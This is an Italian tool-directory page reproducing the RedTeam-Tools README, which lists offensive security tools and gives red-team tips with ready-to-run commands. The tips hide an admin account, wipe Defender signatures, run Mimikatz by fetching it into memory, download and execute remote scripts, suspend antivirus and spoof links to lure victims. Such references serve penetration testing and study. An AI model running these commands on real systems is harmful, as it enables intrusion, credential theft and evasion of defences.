Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RedTeam-Tools — Strumenti e tecniche per Red Team / Penetration Testing | Kitploit
Strumenti/GitHubGitHub/a-poc/redteam-tools
OSINT (Open Source Intelligence)Escalation di PrivilegiRicognizioneExploitMovimento LateralePost-ExploitPhishingPenetration TestingRed TeamingSviluppo Payload
GitHuba-poc/redteam-tools

RedTeam-Tools

9.6k1.3k114 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumenti e tecniche per Red Team / Penetration Testing

Vedi Repository

RedTeam-Tools

Questa repository GitHub contiene una collezione di 150+ strumenti e risorse utili per attività di red teaming.

Alcuni strumenti sono progettati specificamente per il red teaming, mentre altri sono più generici e possono essere adattati a un contesto di red teaming.

🔗 Se sei un Blue Teamer, dai un'occhiata a BlueTeam-Tools

Avviso

I materiali in questa repository sono solo a scopo informativo ed educativo. Non sono destinati a essere utilizzati in attività illegali.

Nota

Nascondi le intestazioni dell'elenco degli strumenti con la freccia.

Clicca 🔙 per tornare all'elenco.

Elenco Strumenti

Red Team Tips 19 consigli
    • Smuggling HTML migliorato con eventlistener del movimento del mouse @pr0xylife
    • Google Translate per il phishing @malmoeb
    • Nascondere l'account amministratore locale @Alh4zr3d
    • Rendere inutilizzabile Windows Defender eliminando le firme @Alh4zr3d
    • Abilitare più sessioni RDP per utente @Alh4zr3d
    • Alternativa locale a Sysinternals PsExec.exe @GuhnooPlusLinux
    • Scanner di porte live off the land @Alh4zr3d
    • PowerShell DownloadString compatibile con proxy @Alh4zr3d
    • Cercare endpoint interni nei segnalibri del browser @Alh4zr3d
    • Interrogare i record DNS per enumerazione @Alh4zr3d
    • Percorsi di servizio senza virgolette senza PowerUp @Alh4zr3d
    • Bypassare un prompt dei comandi disabilitato con /k Martin Sohn Christensen
    • Impedire a Windows Defender di eliminare mimikatz.exe @GuhnooPlusLinux
    • Verificare se si è in una macchina virtuale @dmcxblue
    • Enumerare le regole di AppLocker @Alh4zr3d
    • Collegamento a cmd con 6 pixel tramite mspaint PenTestPartners
    • Spoofing di link con il metodo PreventDefault di JavaScript
    • Verificare le regole del firewall SMB con Responder @malmoeb
    • Disabilitare l'antivirus con SysInternals PsSuspend @0gtweet
Ricognizione 24 strumenti
    • SpiderFoot OSINT automatizzato e mappatura della superficie d'attacco
    • ReconFTW Strumento automatizzato di ricognizione di sottodomini e vulnerabilità
    • Subzy Verificatore di takeover di sottodomini
    • smtp-user-enum Enumerazione utenti SMTP
    • crt.sh -> httprobe -> EyeWitness Screenshot automatizzato di domini
    • jsendpoints Estrazione dei link DOM di una pagina
    • Nuclei Scanner di vulnerabilità
    • certSniff Sniffer di parole chiave nei log di trasparenza dei certificati
    • Gobuster Brute force di percorsi web
    • Feroxbuster Strumento veloce di discovery dei contenuti scritto in Rust
    • CloudBrute Brute force di infrastrutture cloud
    • dnsrecon Enumerazione dei record DNS
    • Shodan.io Knowledge base di sistemi pubblici
    • AORT (All in One Recon Tool) Enumerazione di sottodomini
    • spoofcheck Verificatore di record SPF/DMARC
    • AWSBucketDump Enumerazione di bucket S3
    • GitHarvester Ricerca di credenziali su GitHub
    • truffleHog Scanner di credenziali su GitHub
    • Dismap Scoperta/identificazione di asset
    • enum4linux Enumerazione Windows/samba
Sviluppo Risorse 12 strumenti
    • remoteinjector Iniettare un collegamento a un modello remoto in un documento Word
    • Chimera Obfuscation di PowerShell
    • msfvenom Creazione di payload
    • Shellter Strumento dinamico di iniezione di shellcode
    • Freeze Creazione di payload (bypass EDR)
    • WordSteal Rubare hash NTLM con Microsoft Word
    • Funzioni NTAPI non documentate Kernel Windows NT, API nativa e driver
    • Funzioni di callback del kernel API Windows non documentate
    • OffensiveVBA Tecniche di esecuzione di codice e evasion tramite macro di Office
    • WSH Payload Wsh
    • HTA Payload Hta
    • VBA Payload Vba
Accesso Iniziale 10 strumenti
    • CredMaster Strumento di password spraying CredKing
    • TREVORspray Password sprayer con threading
    • evilqr PoC di phishing QRLJacking
    • CUPP Profilatore di password utente comuni (CUPP)
    • Bash Bunny Strumento di attacco USB
    • EvilGoPhish Framework per campagne di phishing
    • The Social-Engineer Toolkit Framework per campagne di phishing
    • Hydra Strumento di brute force
    • SquarePhish Framework di phishing OAuth/codice QR
    • King Phisher Framework per campagne di phishing
Esecuzione 13 strumenti
    • Responder Avvelenatore LLMNR, NBT-NS e MDNS
    • secretsdump Dump remoto di hash
    • evil-winrm Shell WinRM
    • Donut Esecuzione in-memory di .NET
    • Macro_pack Obfuscation di macro
    • PowerSploit Suite di script PowerShell
    • Rubeus Strumento di hacking per Active Directory
    • SharpUp Identificatore di vulnerabilità Windows
    • SQLRecon Toolkit offensivo per MS-SQL
    • UltimateAppLockerByPassList Tecniche comuni di bypass di AppLocker
    • StarFighters Launcher Empire basato su JavaScript e VBScript
    • demiguise Strumento di crittografia HTA
    • PowerZure Framework PowerShell per valutare la sicurezza di Azure
Persistenza 4 strumenti
    • Impacket Suite di script Python
    • Empire Framework di post-exploitation
    • SharPersist Toolkit di persistenza Windows
    • ligolo-ng Strumento di tunneling che utilizza un'interfaccia TUN
Escalation dei Privilegi 11 strumenti
    • Crassus Strumento di scoperta per escalation dei privilegi su Windows
    • LinPEAS Escalation dei privilegi su Linux
    • WinPEAS Escalation dei privilegi su Windows
    • linux-smart-enumeration Escalation dei privilegi su Linux
    • Certify Escalation dei privilegi in Active Directory
    • Get-GPPPassword Estrazione di password Windows
    • Sherlock Strumento PowerShell per escalation dei privilegi
    • Watson Strumento per escalation dei privilegi su Windows
    • ImpulsiveDLLHijack Strumento di DLL Hijack
    • ADFSDump Strumento di dump di AD FS
    • BeRoot Progetto di escalation dei privilegi multi-OS
Evasione della Difesa 8 strumenti
    • Invoke-Obfuscation Obfuscator di script
    • Veil Obfuscator di payload Metasploit
    • SharpBlock Bypass EDR tramite prevenzione dell'esecuzione al punto di ingresso
    • Alcatraz Obfuscator GUI per binari x64
    • Mangle Manipolazione di eseguibili compilati
    • AMSI Fail Frammenti PowerShell che rompono o disabilitano AMSI
    • ScareCrow Framework di creazione payload progettato per bypass EDR
    • moonwalk Rimozione di log di sistema Linux e timestamp del filesystem
Accesso alle Credenziali 11 strumenti
    • Mimikatz Estrattore di credenziali Windows
    • LaZagne Estrattore di password locali
    • hashcat Cracking di hash di password
    • John the Ripper Cracking di hash di password
    • SCOMDecrypt Strumento di decifratura credenziali SCOM
    • nanodump Creazione di minidump del processo LSASS
    • eviltree Remake di tree per scoperta di credenziali
    • SeeYouCM-Thief Parsing dei file di configurazione dei sistemi telefonici Cisco
    • MailSniper Ricercatore di posta Microsoft Exchange
    • SharpChromium Estrattore di cookie, cronologia e login salvati di Chromium
    • dploot Furto remoto di DPAPI in Python
Scoperta 6 strumenti
    • PCredz Scoperta di credenziali da PCAP/interfaccia live
    • PingCastle Valutatore di Active Directory
    • Seatbelt Scanner locale di vulnerabilità
    • ADRecon Ricognizione di Active Directory
    • adidnsdump Dump di DNS integrato in Active Directory
    • scavenger Strumento di scansione per setacciare sistemi
Movimento Laterale 12 strumenti
    • crackmapexec Toolkit di movimento laterale per Windows/Active Directory
    • WMIOps Comandi remoti WMI
    • PowerLessShell PowerShell remoto senza PowerShell
    • PsExec Sostituto leggero di telnet
    • LiquidSnake Movimento laterale senza file
    • Abilitare RDP Comando per abilitare RDP su Windows
    • Aggiornare shell a meterpreter Miglioramento della reverse shell
    • Inoltro Porte Comando di port forwarding locale
    • Reverse shell Jenkins Comando shell Jenkins
    • ADFSpoof Falsificare token di sicurezza AD FS
    • kerbrute Strumento per brute force pre-autenticazione Kerberos
    • Coercer Costringere un server Windows ad autenticarsi
    • WMIOps Comandi remoti WMI
Raccolta 3 strumenti
    • BloodHound Visualizzazione di Active Directory
    • Snaffler Collettore di credenziali di Active Directory
    • linWinPwn Enumerazione e controlli di vulnerabilità di Active Directory
Comando e Controllo 9 strumenti
    • Progetto Living Off Trusted Sites Sfruttare domini legittimi per il tuo C2
    • Havoc Framework di comando e controllo
    • Covenant Framework di comando e controllo (.NET)
    • Merlin Framework di comando e controllo (Golang)
    • Metasploit Framework Framework di comando e controllo (Ruby)
    • Pupy Framework di comando e controllo (Python)
    • Brute Ratel Framework di comando e controllo ($$$)
    • NimPlant Impianto C2 scritto in Nim
    • Hoaxshell Reverse shell PowerShell
Esfiltrazione 6 strumenti
    • Dnscat2 C2 tramite tunneling DNS
    • Cloakify Trasformazione dei dati per esfiltrazione
    • PyExfil PoC di esfiltrazione dati
    • Powershell RAT Backdoor basata su Python
    • GD-Thief Esfiltrazione da Google Drive
    • goshs Server multi-protocollo a singolo binario per trasferimento file ed esfiltrazione
Impatto 4 strumenti
    • Fuga della Guida Pentester Conti Toolkit affiliato del gruppo ransomware Conti
    • SlowLoris Denial of service semplice
    • usbkill Kill-switch anti-forense
    • Keytap Ottenere i tasti premuti dalla digitazione audio

Red Team Tips

Impara dai Red Teamer con una raccolta di consigli di Red Teaming. Questi consigli coprono una serie di tattiche, strumenti e metodologie per migliorare le tue capacità di red teaming.

🔙Smuggling HTML migliorato con eventlistener del movimento del mouse

Descrizione: 'Qakbot ha aggiunto un EventListener per il movimento del mouse all'allegato di smuggling HTML per anti-evasione; nelle sandbox lo zip non verrà rilasciato.'

Crediti: @pr0xylife

Link: Twitter

🔙Google Translate per il phishingDescrizione: Credenziali di phishing riuscite rubate tramite la funzionalità di visualizzazione delle pagine di Google Translate.

Crediti: @malmoeb

Link: Twitter

🔙Nascondere l'account amministratore locale```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Descrizione:** *'Creare account è rischioso quando si elude il blu, ma quando si crea un amministratore locale, usa un po' di magia nel registro per nasconderlo.'*

**Crediti:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)Disabilitare Windows Defender cancellando le firme```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Descrizione: 'Un po' disordinato, ma se Windows Defender ti sta causando un grosso mal di testa, piuttosto che disabilitarlo (che allerta l'utente), dovresti semplicemente neutralizzarlo cancellando tutte le firme.'

Crediti: @Alh4zr3d

Link: Twitter

🔙Abilita più sessioni RDP per utente```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**Descrizione:** *'A volte vuoi accedere a un host tramite RDP o simile, ma il tuo utente ha una sessione attiva. Abilita più sessioni per utente.'*

**Crediti:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Alternativa locale di Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Descrizione: 'Sei stanco di caricare Sysinternals PsExec.exe quando fai movimento laterale? Windows ha un'alternativa migliore preinstallata. Prova questa invece.'

Crediti: @GuhnooPlusLinux

Collegamento: Twitter

🔙Live off the land port scanner```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**Descrizione:** *'Quando possibile, sfrutta gli strumenti nativi del sistema piuttosto che caricare tool sulle macchine (per molte ragioni). PowerShell/.NET aiutano. Es: semplice port scanner in Powershell.'*

**Crediti:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Descrizione: 'La maggior parte delle grandi organizzazioni utilizza proxy web al giorno d'oggi. Il download cradle standard di PowerShell non è compatibile con i proxy. Usa questo.'

Crediti: @Alh4zr3d

Link: Twitter

🔙Cercare endpoint interni nei segnalibri del browser```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**Descrizione:** *'Saresti sorpreso di ciò che puoi scoprire solo dai segnalibri di un utente. Endpoint interni a cui possono accedere, per esempio.'*

**Crediti:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)Interroga i record DNS per enumerazione```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Descrizione: 'L'enumerazione costituisce il 95% del gioco. Tuttavia, lanciare tonnellate di scansioni per valutare l'ambiente è molto rumoroso. Perché non chiedere semplicemente al server DC/DNS tutti i record DNS?'

Crediti: @Alh4zr3d

Link: Twitter

🔙Percorsi di servizio non quotati senza PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**Descrizione:** *'Trovare percorsi di servizio non quotati senza PowerUp'*

**Crediti:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)Aggirare un prompt dei comandi disabilitato con /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Descrizione: 'Questo prompt dei comandi è stato disabilitato dall'amministratore...' Di solito si vede in ambienti come i PC chioschi, una soluzione rapida e approssimativa è utilizzare /k tramite la finestra di esecuzione di Windows. Questo eseguirà il comando e poi mostrerà il messaggio di restrizione, consentendo l'esecuzione dei comandi.

Crediti: Martin Sohn Christensen

Link: Blog

🔙Impedisci a Windows Defender di cancellare mimikatz.exe```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**Descrizione:** *'Sei stanco che Windows Defender cancelli mimikatz.exe? Prova invece questo.'*

**Crediti:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**Collegamento:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)Controlla se sei in una macchina virtuale```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Descrizione: 'Vuoi sapere se sei in una macchina virtuale? Interroga le chiavi del registro e scoprilo!!! Se vengono visualizzati dei risultati, allora sei in una macchina virtuale.'

Credito: @dmcxblue

Link: Twitter

🔙Enumerare le regole di AppLocker```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**Descrizione:** *'AppLocker può essere una seccatura. Enumerare per vedere quanto è doloroso'*

**Crediti:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

### [🔙](#tool-list)Scorciatoia CMD con 6 pixel tramite mspaint

![image](https://assets.kitploit.com/production/public/readmes/147/db03137fe19c2c20481ca53abc8beb4b7afadcf1d2add350ce26d37f75fdc41b.png)

1. Apri MSPaint.exe e imposta le dimensioni della tela su: Larghezza=6 e Altezza=1 pixel
2. Ingrandisci per facilitare le operazioni successive
3. Usando il selettore colore, imposta i valori dei pixel a (da sinistra a destra):
    - 1°: R: 10, G: 0, B: 0
    - 2°: R: 13, G: 10, B: 13
    - 3°: R: 100, G: 109, B: 99
    - 4°: R: 120, G: 101, B: 46
    - 5°: R: 0, G: 0, B: 101
    - 6°: R: 0, G: 0, B: 0
4. Salva come bitmap a 24 bit (*.bmp;*.dib)
5. Cambia la sua estensione da bmp a bat ed esegui.

**Descrizione:** *'Un metodo insolito, ma efficace per ottenere una shell creando un collegamento a cmd.exe disegnando certi colori in Microsoft Paint. Grazie all'algoritmo di codifica utilizzato per scrivere file BMP, è possibile dettare dati ASCII scritti in un file selezionando attentamente certi colori RGB.'*

**Crediti:** [PenTestPartners](https://www.pentestpartners.com/)

**Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)

### [🔙](#tool-list)Spoofing di link con il metodo JavaScript PreventDefault

![image](https://assets.kitploit.com/production/public/readmes/147/49ceb382e5692c79df8ca9b96ed0c17520b7cf7f1091b5b6c214478270c165e8.png)```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

Descrizione: È stato osservato che gli attori malintenzionati utilizzano questa tecnica per indurre le vittime a cliccare su link di download di malware contraffatti all'interno della pagina. Utilizzando il metodo JavaScript PreventDefault è possibile falsificare il collegamento al passaggio del mouse per visualizzare un link legittimo google.com, ma una volta cliccato, la vittima verrà reindirizzata al tuo link dannoso bing.com. Ottimo per indurre le vittime a scaricare payload tramite un sito controllato.

Link: PreventDefault Docs

🔙Controlla le regole del firewall SMB con Responder

image```powershell Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"

root@kitploit:~
**Descrizione:** *'Quando effettuo una Compromise Assessment, spesso chiedo al cliente se posso fare un'ultima rapida verifica: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. Se Responder riesce a catturare l'hash, il firewall permette connessioni SMB in uscita'*

**Crediti:** [@malmoeb](https://twitter.com/malmoeb)

**Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)

### [🔙](#tool-list)Disabilita l'AV con SysInternals PsSuspend

![image](https://assets.kitploit.com/production/public/readmes/147/060631566db51351ace6c248b736fc8878e89ba9aaf8ad4aaf2e478183468b16.png)

**Descrizione:** *Utilizzando lo strumento Sysinternals di Microsoft PsSuspend.exe è possibile sospendere alcuni eseguibili del servizio AV. Lo strumento firmato da Microsoft può ricevere il PID o il nome di un servizio in esecuzione e sospenderà il processo tramite l'API Windows NtSuspendProcess.*

**Post correlato:** [Bypass dell'AV tramite sospensione del processo con PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)

**Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)

Ricognizione
====================

### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)

SpiderFoot è uno strumento di automazione per l'intelligence open source (OSINT). Si integra con praticamente ogni fonte di dati disponibile e utilizza una serie di metodi per l'analisi dei dati, rendendo tali dati facili da navigare.

SpiderFoot può essere utilizzato offensivamente (ad esempio in un esercizio di red team o in un penetration test) per la ricognizione del tuo target, o difensivamente per raccogliere informazioni su ciò che tu o la tua organizzazione potreste aver esposto su Internet.

**Install:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt

Per le istruzioni complete di installazione vedi qui.

Utilizzo:```python python3 ./sf.py -l 127.0.0.1:5001

root@kitploit:~
Molti video tutorial di utilizzo [qui](https://asciinema.org/~spiderfoot)

![spiderfoot](https://assets.kitploit.com/production/public/readmes/147/bd95a49c8707ebb8b864103b3c024971be0bfef116fecada0a5499165378da14.png)

*Immagine tratta da https://github.com/smicallef/spiderfoot*

### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)

reconFTW automatizza l'intero processo di ricognizione per te. Supera il lavoro di enumerazione dei sottodomini insieme a vari controlli di vulnerabilità e all'ottenimento delle massime informazioni sul tuo target.

**Installazione:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh

Per le istruzioni complete di installazione vedi qui.

Utilizzo:```bash

Single target domain

./reconftw.sh -d target.com -r

One target with multiple domains

./reconftw.sh -m target -l domains.txt -r

Passive recon

./reconftw.sh -d target.com -p

Perform all checks and exploitations

./reconftw.sh -d target.com -a

root@kitploit:~
Per istruzioni complete sull'uso vedi [qui](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

![reconftw](https://assets.kitploit.com/production/public/readmes/147/319a1191b403d8b616058e77f696f9b2802b59607cc7e908a38e61a8de99a25e.png)

*Immagine tratta da https://www.youtube.com/watch?v=TQmDAtkD1Wo*

### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)

Strumento per il takeover di sottodomini che funziona confrontando le impronte digitali delle risposte da [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).

**Installazione:**```bash
go install -v github.com/PentestPad/subzy@latest

Per istruzioni complete di installazione vedi qui.

Utilizzo:```bash

List of subdomains

./subzy run --targets list.txt

Single or multiple targets

./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

root@kitploit:~
![subzy](https://assets.kitploit.com/production/public/readmes/147/cb8d580bf7a8b0647632d14dda58e9f350703db0fa10ef16cfdc04464520c063.jpg)

*Image used from https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*

### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)

Enumerazione utenti SMTP tramite VRFY, EXPN e RCPT con funzionalità di timeout intelligente, riprova e riconnessione.

**Installazione:**```bash
pip install smtp-user-enum

Utilizzo:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

root@kitploit:~
![smtp-user-enum](https://assets.kitploit.com/production/public/readmes/147/d5d973253dfaa7e98d497954d59b83f166ba7b3807d24714a6ac40189fbdc15e.png)

*Immagine usata da https://www.kali.org/tools/smtp-user-enum/*

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

Ho preparato uno script bash one-liner che:
- Raccoglie passivamente un elenco di sottodomini dalle associazioni di certificati ([crt.sh](https://crt.sh/))
- Interroga attivamente ciascun sottodominio per verificarne l'esistenza ([httprobe](https://github.com/tomnomnom/httprobe))
- Effettua attivamente uno screenshot di ciascun sottodominio per la revisione manuale ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**Uso:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Nota: Devi avere httprobe, pup e EyeWitness installati e cambiare 'DOMAIN_COM' con il dominio target. Puoi eseguire questo script contemporaneamente in finestre di terminale se hai più domini root target

image

image

🔙jsendpoints

Un bookmarklet JavaScript per estrarre tutti i link degli endpoint di una pagina web.

Creato da @renniepak, questo snippet di codice JavaScript può essere utilizzato per estrarre tutti gli endpoint (che iniziano con /) dal DOM della pagina web corrente, inclusi tutti i sorgenti di script esterni incorporati nella pagina web.```javascript javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();

root@kitploit:~
**Utilizzo (Bookmarklet)** 

Crea un bookmarklet...

- `Right click your bookmark bar`
- `Click 'Add Page'`
- `Paste the above Javascript in the 'url' box`
- `Click 'Save'`

...poi visita la pagina vittima nel browser e clicca sul bookmarklet.

![image](https://assets.kitploit.com/production/public/readmes/147/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**Utilizzo (Console)** 

Incolla il codice Javascript sopra nella finestra della console `F12` e premi Invio.

![image](https://assets.kitploit.com/production/public/readmes/147/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

Scanner di vulnerabilità veloce che utilizza modelli .yaml per cercare problemi specifici.

**Installazione:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Uso:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff è un watcher di parole chiave per i log di Certificate Transparency che ho scritto in Python. Utilizza la libreria certstream per monitorare i log di creazione dei certificati che contengono parole chiave definite in un file.

Puoi avviarlo con diverse parole chiave relative al dominio della tua vittima; qualsiasi creazione di certificato verrà registrata e potrebbe portare alla scoperta di domini di cui non eri a conoscenza.

**Installazione:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Utilizzo:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/61dca92ec35e9bafb2004f44e045f4fa02fb05263456ac447c323e7becb3cbc3.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

Ottimo strumento per il brute forcing di percorsi di file/cartelle su un sito web vittima.

**Installazione:**```bash
sudo apt install gobuster

Utilizzo:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

Uno strumento progettato per eseguire Forced Browsing, un attacco in cui l'obiettivo è enumerare e accedere a risorse che non sono referenziate dall'applicazione web, ma sono comunque accessibili a un attaccante.

Feroxbuster utilizza la forza bruta combinata con una wordlist per cercare contenuti non collegati nelle directory di destinazione. Queste risorse possono memorizzare informazioni sensibili su applicazioni web e sistemi operativi, come codice sorgente, credenziali, indirizzi di rete interni, ecc...

**Installazione: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

Installa: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**Installa: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Per le istruzioni di installazione complete, vedi qui.

Uso:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![image](https://assets.kitploit.com/production/public/readmes/147/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

*Immagine utilizzata da https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

Uno strumento per trovare l'infrastruttura, i file e le app di un'azienda (target) nei principali provider cloud (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Caratteristiche:

- Rilevamento cloud (API IPINFO e Codice Sorgente)
- Veloce (concorrente)
- Multipiattaforma (windows, linux, mac)
- Randomizzazione User-Agent
- Randomizzazione Proxy (HTTP, Socks5)

**Installazione:** 

Scarica l'ultima [release](https://github.com/0xsha/CloudBrute/releases) per il tuo sistema e segui l'utilizzo.

**Utilizzo:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Immagine tratta da https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon è uno strumento pyhton per enumerare record DNS (MX, SOA, NS, A, AAAA, SPF e TXT) e può fornire un numero di nuovi host vittime associati da cui fare pivot a partire da una singola ricerca di dominio.

Installazione:```bash sudo apt install dnsrecon

root@kitploit:~
**Utilizzo:**```bash
dnsrecon -d google.com

image

🔙shodan.io

